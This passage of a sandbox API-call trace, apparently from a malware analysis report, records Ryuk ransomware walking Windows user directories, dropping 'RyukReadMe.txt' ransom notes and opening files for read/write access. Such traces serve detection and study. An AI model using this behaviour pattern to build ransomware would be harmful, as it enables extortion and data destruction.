lpFindFileData=0x29ac2e0) returned 1 [0159.802] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.802] SetLastError (dwErrCode=0x0) [0159.802] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.802] GetLastError () returned 0x5 [0159.802] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.802] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.802] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0159.803] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.803] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.803] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.803] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0159.803] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.803] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.803] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.804] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0159.804] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.804] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0159.804] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.804] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.804] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.804] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0159.804] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0159.805] SetLastError (dwErrCode=0x0) [0159.805] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.805] GetLastError () returned 0x5 [0159.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0) returned 0 [0159.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.805] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.805] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.805] SetLastError (dwErrCode=0x0) [0159.805] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.805] GetLastError () returned 0x5 [0159.805] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.805] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.805] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.805] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.805] SetLastError (dwErrCode=0x0) [0159.806] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.806] GetLastError () returned 0x5 [0159.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.806] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.806] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.806] SetLastError (dwErrCode=0x0) [0159.806] CreateFileW (lpFileName="C:\\Users\\All Users\\Package Cache\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\package cache\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.806] GetLastError () returned 0x5 [0159.806] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.806] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.806] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.806] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.806] SetLastError (dwErrCode=0x0) [0159.806] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.807] GetLastError () returned 0xb7 [0159.807] CloseHandle (hObject=0x184) returned 1 [0159.807] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Start Menu\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.807] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.807] SetLastError (dwErrCode=0x0) [0159.807] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\start menu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.807] GetLastError () returned 0x5 [0159.807] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.807] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.807] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.807] SetLastError (dwErrCode=0x0) [0159.807] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.807] GetLastError () returned 0xb7 [0159.807] CloseHandle (hObject=0x184) returned 1 [0159.807] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.808] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.808] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.808] SetLastError (dwErrCode=0x0) [0159.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.808] GetLastError () returned 0xb7 [0159.808] CloseHandle (hObject=0x188) returned 1 [0159.808] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.808] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.808] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.808] SetLastError (dwErrCode=0x0) [0159.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.808] GetLastError () returned 0xb7 [0159.808] CloseHandle (hObject=0x18c) returned 1 [0159.808] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.808] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.809] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.809] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.809] SetFileAttributesW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml", dwFileAttributes=0x80) returned 0 [0159.809] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\jaureglist.xml" (normalized: "c:\\users\\all users\\sun\\java\\java update\\jaureglist.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.809] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.809] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.809] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.809] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0159.809] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0159.810] SetLastError (dwErrCode=0x0) [0159.810] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\Java Update\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\sun\\java\\java update\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0159.810] GetLastError () returned 0xb7 [0159.810] CloseHandle (hObject=0x18c) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0159.810] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0159.810] SetLastError (dwErrCode=0x0) [0159.810] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\Java\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\sun\\java\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0159.810] GetLastError () returned 0xb7 [0159.810] CloseHandle (hObject=0x188) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.810] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0159.810] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0159.810] SetLastError (dwErrCode=0x0) [0159.810] CreateFileW (lpFileName="C:\\Users\\All Users\\Sun\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\sun\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.811] GetLastError () returned 0xb7 [0159.811] CloseHandle (hObject=0x184) returned 1 [0159.811] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.811] SetLastError (dwErrCode=0x0) [0159.811] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0159.811] GetLastError () returned 0xb7 [0159.811] CloseHandle (hObject=0x184) returned 1 [0159.811] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Templates\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0159.811] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.811] SetLastError (dwErrCode=0x0) [0159.811] CreateFileW (lpFileName="C:\\Users\\All Users\\Templates\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.811] GetLastError () returned 0x5 [0159.811] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.811] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.811] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0 [0159.812] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0159.812] SetLastError (dwErrCode=0x0) [0159.812] CreateFileW (lpFileName="C:\\Users\\All Users\\RyukReadMe.txt" (normalized: "c:\\users\\all users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0159.812] GetLastError () returned 0xb7 [0159.812] CloseHandle (hObject=0x180) returned 1 [0159.812] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29ae1a0 | out: lpFindFileData=0x29ae1a0) returned 1 [0159.812] SetLastError (dwErrCode=0x0) [0159.812] CreateFileW (lpFileName="C:\\Users\\RyukReadMe.txt" (normalized: "c:\\users\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.812] GetLastError () returned 0x5 [0159.812] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ae150, lpOverlapped=0x0) returned 0 [0159.812] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.812] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\*.*", lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 0x3a2d60 [0159.829] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.829] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0159.829] SetLastError (dwErrCode=0x0) [0159.829] CreateFileW (lpFileName="C:\\Users\\Default\\RyukReadMe.txt" (normalized: "c:\\users\\default\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.829] GetLastError () returned 0x5 [0159.829] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0) returned 0 [0159.829] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.829] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0159.830] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.830] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0159.830] SetLastError (dwErrCode=0x0) [0159.830] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.830] GetLastError () returned 0x5 [0159.830] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0159.830] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.830] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0159.831] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.831] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.831] SetLastError (dwErrCode=0x0) [0159.831] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.831] GetLastError () returned 0x5 [0159.831] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.831] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.831] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.831] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.831] SetLastError (dwErrCode=0x0) [0159.831] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Application Data\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\application data\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.832] GetLastError () returned 0x5 [0159.832] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.832] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.832] SetLastError (dwErrCode=0x0) [0159.832] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.832] GetLastError () returned 0x5 [0159.832] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.832] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.832] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0159.832] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0159.832] SetLastError (dwErrCode=0x0) [0159.832] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\History\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\history\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.861] GetLastError () returned 0x5 [0159.861] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.861] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0159.862] SetFileAttributesW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db", dwFileAttributes=0x80) returned 0 [0159.863] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.863] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0159.863] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0159.863] SetLastError (dwErrCode=0x0) [0159.863] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0159.863] GetLastError () returned 0x5 [0159.863] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0159.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0159.863] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0159.863] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.863] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0159.863] SetLastError (dwErrCode=0x0) [0159.864] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, 